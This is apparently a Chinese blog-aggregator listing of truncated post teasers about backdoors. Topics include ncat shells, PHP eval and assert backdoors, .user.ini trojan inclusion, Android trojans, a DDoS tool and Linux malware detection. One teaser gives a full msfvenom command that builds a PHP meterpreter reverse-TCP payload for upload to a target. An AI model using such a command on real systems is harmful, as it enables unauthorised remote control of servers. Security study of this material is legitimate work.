2019 2020 2 网络对抗技术 20175209 Exp2 后门原理与实践 一、常用的后门工具 1. ncat ncat是一个底层工具,进行基本的TCP UDP数据收发。常被与其他工具结合使用,起到后门的作用。 Windows获取kali的shell + 在Windows中查看本机IP地址为 ...
分类:
其他好文 时间:
2020-03-10 15:51:58
阅读次数:
67
PHP常见代码执行后门函数 代码执行: 应用程序在调用一些能够将字符串转换为代码的函数(例如php中的eval中),没有考虑用户是否控制这个字符串,将造成代码执行漏洞。 常见php代码执行函数介绍 常用执行代码函数 1、eval(): eval函数将接受的字符串当做代码执行 2、 assert(): ...
分类:
Web程序 时间:
2020-02-25 10:01:00
阅读次数:
142
如何快速找出Linux服务器上不该存在恶意或后门文件。前段时间我在APT写作时注意到一个问题,我发现网上大多都是关于Windows恶意软件检测的文章以及教程,而关于如何寻找Linux系统上恶意软件的资料却少之又少。因此,这篇文章主要是向大家介绍一些有关检查Linux系统恶意软件的技巧和方法。话不多说 ...
分类:
系统相关 时间:
2020-02-24 11:24:24
阅读次数:
90
对使用Windows的人来说,病毒无处不在,各种各样的新型病毒层出不穷,近年来,一种类似Unix的操作系统也在发展壮大,开始走进我们的视野,并在各领域内得到应用,它就是Linux系统,对于受病毒困扰的用户来说,Linux会是一块没有病毒的乐土吗? 一、当心Linux病毒 在Linux出现之初,由于其 ...
分类:
系统相关 时间:
2020-02-23 22:08:02
阅读次数:
84
0x00 昨天(2020.2.21)看到有人聊CC,也是,CC/DDOS简单粗暴的攻击网站的方法 别人写的程序怕后门,API有时候还会掉,不稳定,于是想自己写一个。 1x00 严格来说,这个程序是属于DDOS的,我觉得不管是CC还是DDOS,目的都一样 也就没有明白滴区分[:P] 1x01 由于TC ...
分类:
其他好文 时间:
2020-02-22 09:40:05
阅读次数:
87
一 建立反弹后门 msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R > test3.php 注:生成的反弹木马存放在当前用户home目录下; 将生成的木马上传到目标机中,可以远程访问; windows下as ...
分类:
Web程序 时间:
2020-02-19 13:05:16
阅读次数:
266
参考博客:https://www.cnblogs.com/20175211lyz/p/11455355.html 首先先来看看.user.ini文件 利用.user.ini上传\隐藏后门 参考链接:user.ini文件构成的PHP后门 条件: 1、服务器脚本语言为PHP 2、服务器使用CGI/Fas ...
分类:
Web程序 时间:
2020-02-10 14:05:12
阅读次数:
97
.user.ini文件自动包含木马文件(后门): 前提条件: 1.正常的php文件 2. 文件 3.muma.gif图片马 利用步骤: 1、创建一个文件夹test,大家可能会有疑问,为什么还要再创建一个文件夹test,其实就是如果根目录本身就有user.ini的话,那么就会有影响,同样的会层层往上层 ...
分类:
Web程序 时间:
2020-01-18 23:59:12
阅读次数:
247
首先控制安卓手机,需要生成一个木马,生成后门 kali的IP地址:172.16.3.45 1.要达到远程控制安卓手机,你需要避开公网,所以在这里可以去买条隧道,我使用的是natapp里面的隧道 在natapp里面注册登录,可以去免费领取一条隧道,也可以去购买隧道,都很实惠的 2.获得隧道对应的IP地 ...
分类:
移动开发 时间:
2020-01-07 17:49:27
阅读次数:
1891
没有24-7的连接性,这些天几乎不可能售出新车。在线连接是舒适选择和现代旅行服务的重要推动力。可悲的是,从安全角度来看,他们充满了风险。系统地评估风险使您可以识别对联网汽车构成的潜在威胁。聪明的***通常会立即知道他们在哪里可以找到后门入口,即使您确实采用了防御机制,但有时这些门有时在您的产品开发过程中被意外打开。随着自动驾驶汽车(AV)准备在未来五到十年内充斥市场,制造商必须解决的最大问题是汽车安
分类:
Web程序 时间:
2019-12-31 01:13:39
阅读次数:
119